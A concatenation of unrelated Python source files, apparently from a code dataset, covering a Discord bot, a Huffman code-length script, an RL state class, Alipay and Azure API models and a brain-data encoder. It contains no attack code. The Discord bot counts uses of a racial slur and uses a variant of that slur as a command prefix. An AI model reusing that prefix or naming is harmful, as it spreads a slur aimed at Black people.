        0,
        False,
    ],
    ["What was the first act of war?", " ", 0, False,],
]
# Rows are [title, context, question, answer_text, start_pos_char, is_impossible].
TRAIN_DATA = [[title, context, *d] for d in train_ques_ans_list]
TEST_DATA = [[title, context, *d] for d in test_ques_ans_list]
|
"""Main file
N-word Counter bot
"""
import os
from json import load
from pathlib import Path
import discord
from discord.ext import commands
# Fetch bot token.
# NOTE(review): `load` here is json.load, which the `load` bot command defined
# further down shadows; the config is read before that definition, so behavior
# is unaffected, but the shadowing is fragile.
with Path("../config.json").open() as f:
    config = load(f)
TOKEN = config["DISCORD_TOKEN"]
# Me and my alt account(s).
owner_ids = (354783154126716938, 691896247052927006)
bot = commands.Bot(
    command_prefix=["nibba ", "n!"],
    case_insensitive=True,
    intents=discord.Intents.all(),
    help_command=commands.MinimalHelpCommand()
)  # https://bit.ly/3rJiM2S
@bot.event
async def on_ready():
    """Display successful startup status"""
    print(f"{bot.user} connected!")
@bot.command()
async def ping(ctx):
    """Pong back latency"""
    # bot.latency is in seconds; report it in milliseconds.
    await ctx.send(f"_Pong!_ ({round(bot.latency * 1000, 1)} ms)")
async def _manage_cogs(context, extension, actions, verb):
    """Shared body of the load/unload/reload commands.

    actions -- bot methods to apply, each called with "cogs.<extension>"
    verb -- word used in the success message ("load" / "unload" / "reload")
    Only accounts in owner_ids may run these; others get a refusal message.
    """
    msg_success = f"File **{verb}** of {extension}.py successful."
    msg_fail = "You do not have permission to do this"
    if context.author.id in owner_ids:
        for action in actions:
            action(f"cogs.{extension}")
        print(msg_success)
        await context.send(msg_success)
    else:
        await context.send(msg_fail)

@bot.command()
@commands.has_permissions(administrator=True)
async def load(context, extension):
    """(Bot dev only) Load a cog into the bot"""
    # NOTE: this command name shadows json.load imported at the top of the
    # file; the config file is read before this definition, so behavior is
    # unaffected, but keep it in mind when editing.
    await _manage_cogs(context, extension, [bot.load_extension], "load")

@bot.command()
@commands.has_permissions(administrator=True)
async def unload(context, extension):
    """(Bot dev only) Unload a cog from the bot"""
    await _manage_cogs(context, extension, [bot.unload_extension], "unload")

@bot.command()
@commands.has_permissions(administrator=True)
async def reload(context, extension):
    """(Bot dev only) Reload a cog into the bot"""
    await _manage_cogs(
        context, extension, [bot.unload_extension, bot.load_extension], "reload"
    )
# Load cogs into the bot.
for filename in os.listdir("./cogs"):
    if filename.endswith(".py"):
        # Strip the ".py" suffix to get the module name.
        bot.load_extension(f"cogs.{filename[:-3]}")
# Start the event loop; blocks until the bot shuts down.
bot.run(TOKEN)
|
import heapq
from collections import namedtuple
# A Huffman node: ordered by weight first (what heapq compares); index is a
# '+'-joined trail of the original leaf indices merged into this node.
Node = namedtuple('Node', ('weight', 'index'))

def read_file(name):
    """Given the path/name of the text file, return the heap with nodes.

    The first line (a count) is skipped; the first token of each remaining
    line is parsed as that leaf's weight.
    """
    tree = []
    # `with` guarantees the handle is closed (the original leaked it).
    with open(name, 'r') as file:
        data = file.readlines()
    for index, line in enumerate(data[1:]):
        item = line.split()
        tree.append(Node(int(item[0]), str(index)))
    heapq.heapify(tree)
    return tree
def combine(a, b):
    """Merge two nodes: weights add, index trails concatenate with '+'."""
    return Node(a.weight + b.weight, f'{a.index}+{b.index}')
def huffman(tree):
    """Given the initial heap of Nodes, return the Huffman code length of
    each original leaf (indexed by position).

    The heap is consumed down to a single node in the process.
    """
    code_len = [0] * len(tree)
    while len(tree) > 1:
        # Pop the two minimum-weight nodes and reinsert their combination.
        a = heapq.heappop(tree)
        b = heapq.heappop(tree)
        new_node = combine(a, b)
        heapq.heappush(tree, new_node)
        # Every leaf under the merged node gains one bit of code length.
        for leaf in (int(item) for item in new_node.index.split('+')):
            code_len[leaf] += 1
    return code_len
def main():
    """Build the heap from huffman.txt and print the max and min code lengths."""
    tree = read_file('huffman.txt')
    codes = huffman(tree)
    print(max(codes), min(codes))
if __name__ == '__main__':
    main()
### Test case
# NOTE(review): this block runs at import time as well, not only under
# __main__ — it prints the code lengths for a small hand-built example.
a = Node(3,'0')
b = Node(2,'1')
c = Node(6,'2')
d = Node(8,'3')
e = Node(2,'4')
f = Node(6,'5')
tree = [a,b,c,d,e,f]
heapq.heapify(tree)
len_code = huffman(tree)
print(len_code)
|
from typing import Optional, List
from rlai.actions import Action
from rlai.meta import rl_text
@rl_text(chapter='States', page=1)
class State:
    """
    State.
    """

    def is_feasible(
            self,
            a: Action
    ) -> bool:
        """
        Check whether an action is feasible from the current state. This uses a set-based lookup with O(1) complexity,
        which is far faster than checking for the action in self.AA.

        :param a: Action.
        :return: True if the action is feasible from the current state and False otherwise.
        """
        return a in self.AA_set

    def __init__(
            self,
            i: Optional[int],
            AA: List[Action]
    ):
        """
        Initialize the state.

        :param i: Identifier for the state.
        :param AA: All actions that can be taken from this state.
        """
        self.i = i
        self.AA = AA

        # use set for fast existence checks (e.g., in `is_feasible` function)
        self.AA_set = set(self.AA)

    def __str__(
            self
    ) -> str:
        """
        Get string description of state.

        :return: String.
        """
        return f'State {self.i}'

    def __hash__(
            self
    ) -> int:
        """
        Get hash code for state.

        :return: Hash code
        """
        # hash(self.i) rather than self.i: returning None (when i is None)
        # would raise TypeError, and for ints hash(i) == i anyway.
        return hash(self.i)

    def __eq__(
            self,
            other: object
    ) -> bool:
        """
        Check whether the current state equals another.

        :param other: Other state.
        :return: True if equal and False otherwise.
        """
        if not isinstance(other, State):
            raise ValueError(f'Expected {State}')

        return self.i == other.i

    def __ne__(
            self,
            other: object
    ) -> bool:
        """
        Check whether the current state is not equal to another.

        :param other: Other state.
        :return: True if not equal and False otherwise.
        """
        return not (self == other)
|
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Show GMN status information.
The information is the same that is available under /home in the Web UI. Output is in JSON.
"""
import d1_common.types.exceptions
import d1_common.xml
import d1_gmn.app.did
import d1_gmn.app.mgmt_base
import d1_gmn.app.models
class Command(d1_gmn.app.mgmt_base.GMNCommandBase):
    """Management command stub; the module docstring is used as its help text."""

    def __init__(self, *args, **kwargs):
        super().__init__(__doc__, __name__, *args, **kwargs)

    def add_arguments(self, parser):
        # No command-specific arguments yet.
        # self.add_arg_force(parser)
        pass

    def handle_serial(self):
        # Not implemented yet; the command currently does nothing.
        pass
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class UnfreezeOrderDetail(object):
    """Detail record of an unfreeze order (Alipay fund-freeze API model)."""

    # Field names, in serialization order, shared by to_alipay_dict /
    # from_alipay_dict.
    _FIELDS = (
        'alipay_order_no',
        'create_time',
        'memo',
        'merchant_order_no',
        'modified_time',
        'order_amount',
        'order_status',
        'unfreeze_amount',
    )

    def __init__(self):
        self._alipay_order_no = None
        self._create_time = None
        self._memo = None
        self._merchant_order_no = None
        self._modified_time = None
        self._order_amount = None
        self._order_status = None
        self._unfreeze_amount = None

    @property
    def alipay_order_no(self):
        return self._alipay_order_no

    @alipay_order_no.setter
    def alipay_order_no(self, value):
        self._alipay_order_no = value

    @property
    def create_time(self):
        return self._create_time

    @create_time.setter
    def create_time(self, value):
        self._create_time = value

    @property
    def memo(self):
        return self._memo

    @memo.setter
    def memo(self, value):
        self._memo = value

    @property
    def merchant_order_no(self):
        return self._merchant_order_no

    @merchant_order_no.setter
    def merchant_order_no(self, value):
        self._merchant_order_no = value

    @property
    def modified_time(self):
        return self._modified_time

    @modified_time.setter
    def modified_time(self, value):
        self._modified_time = value

    @property
    def order_amount(self):
        return self._order_amount

    @order_amount.setter
    def order_amount(self, value):
        self._order_amount = value

    @property
    def order_status(self):
        return self._order_status

    @order_status.setter
    def order_status(self, value):
        self._order_status = value

    @property
    def unfreeze_amount(self):
        return self._unfreeze_amount

    @unfreeze_amount.setter
    def unfreeze_amount(self, value):
        self._unfreeze_amount = value

    def to_alipay_dict(self):
        """Serialize truthy fields to a plain dict, recursing into values
        that themselves support to_alipay_dict()."""
        params = dict()
        for field in self._FIELDS:
            value = getattr(self, field)
            if not value:
                # Falsy values (None, 0, '') are omitted, as before.
                continue
            if hasattr(value, 'to_alipay_dict'):
                value = value.to_alipay_dict()
            params[field] = value
        return params

    @staticmethod
    def from_alipay_dict(d):
        """Build an UnfreezeOrderDetail from a dict; returns None for a falsy input."""
        if not d:
            return None
        o = UnfreezeOrderDetail()
        for field in UnfreezeOrderDetail._FIELDS:
            if field in d:
                setattr(o, field, d[field])
        return o
|
import langbrainscore
import xarray as xr
from langbrainscore.interface.encoder import _Encoder
class BrainEncoder(_Encoder):
    """
    This class is used to extract the relevant contents of a given
    `langbrainscore.dataset.Dataset` object and maintains the Encoder interface.
    """

    def __init__(self) -> "BrainEncoder":
        # No state needed; the dataset is supplied per encode() call.
        pass

    def encode(
        self, dataset: langbrainscore.dataset.Dataset, average_time: bool = False,
    ) -> xr.DataArray:
        """
        returns human measurements related to stimuli (passed in as a Dataset)
        Args:
            langbrainscore.dataset.Dataset: brain dataset object
            average_time: when True, collapse the "timeid" dimension to its
                mean, keeping a singleton timeid coordinate of [0]
        Returns:
            xr.DataArray: contents of brain dataset
        """
        self._check_dataset_interface(dataset)
        if average_time:
            dim = "timeid"
            # Mean over time, then restore a length-1 timeid axis at
            # position 2 so the output shape stays (…, timeid).
            return (
                dataset.contents.mean(dim)
                .expand_dims(dim, 2)
                .assign_coords({dim: (dim, [0])})
            )
        return dataset.contents
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.core.exceptions import HttpResponseError
import msrest.serialization
class ErrorResponse(msrest.serialization.Model):
    """Error response indicates Insights service is not able to process the incoming request. The reason is provided in the error message.

    :param code: Error code.
    :type code: str
    :param message: Error message indicating why the operation failed.
    :type message: str
    """

    # Maps Python attribute -> (JSON key, msrest type) for (de)serialization.
    _attribute_map = {
        'code': {'key': 'code', 'type': 'str'},
        'message': {'key': 'message', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(ErrorResponse, self).__init__(**kwargs)
        self.code = kwargs.get('code', None)
        self.message = kwargs.get('message', None)
class LiveTokenResponse(msrest.serialization.Model):
    """The response to a live token query.

    Variables are only populated by the server, and will be ignored when sending a request.

    :ivar live_token: JWT token for accessing live metrics stream data.
    :vartype live_token: str
    """

    # live_token is server-populated and therefore read-only.
    _validation = {
        'live_token': {'readonly': True},
    }

    _attribute_map = {
        'live_token': {'key': 'liveToken', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(LiveTokenResponse, self).__init__(**kwargs)
        self.live_token = None
class OperationInfo(msrest.serialization.Model):
    """Information about an operation.

    :param provider: Name of the provider.
    :type provider: str
    :param resource: Name of the resource type.
    :type resource: str
    :param operation: Name of the operation.
    :type operation: str
    :param description: Description of the operation.
    :type description: str
    """

    # Maps Python attribute -> (JSON key, msrest type) for (de)serialization.
    _attribute_map = {
        'provider': {'key': 'provider', 'type': 'str'},
        'resource': {'key': 'resource', 'type': 'str'},
        'operation': {'key': 'operation', 'type': 'str'},
        'description': {'key': 'description', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(OperationInfo, self).__init__(**kwargs)
        self.provider = kwargs.get('provider', None)
        self.resource = kwargs.get('resource', None)
        self.operation = kwargs.get('operation', None)
        self.description = kwargs.get('description', None)
class OperationLive(msrest.serialization.Model):
    """Represents an operation returned by the GetOperations request.

    :param name: Name of the operation.
    :type name: str
    :param display: Display name of the operation.
    :type display: ~azure.mgmt.applicationinsights.v2020_06_02_preview.models.OperationInfo
    :param origin: Origin of the operation.
    :type origin: str
    :param properties: Properties of the operation.
    :type properties: object
    """

    # Maps Python attribute -> (JSON key, msrest type); 'display' nests an
    # OperationInfo model.
    _attribute_map = {
        'name': {'key': 'name', 'type': 'str'},
        'display': {'key': 'display', 'type': 'OperationInfo'},
        'origin': {'key': 'origin', 'type': 'str'},
        'properties': {'key': 'properties', 'type': 'object'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(OperationLive, self).__init__(**kwargs)
        self.name = kwargs.get('name', None)
        self.display = kwargs.get('display', None)
        self.origin = kwargs.get('origin', None)
        self.properties = kwargs.get('properties', None)
class OperationsListResult(msrest.serialization.Model):
    """Result of the List Operations operation.

    :param value: A collection of operations.
    :type value: list[~azure.mgmt.applicationinsights.v2020_06_02_preview.models.OperationLive]
    :param next_link: URL to get the next set of operation list results if there are any.
    :type next_link: str
    """

    # Maps Python attribute -> (JSON key, msrest type); value is a list of
    # OperationLive models, next_link supports paging.
    _attribute_map = {
        'value': {'key': 'value', 'type': '[OperationLive]'},
        'next_link': {'key': 'nextLink', 'type': 'str'},
    }

    def __init__(
        self,
        **kwargs
    ):
        super(OperationsListResult, self).__init__(**kwargs)
        self.value = kwargs.get('value', None)
        self.next_link = kwargs.get('next_link', None)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.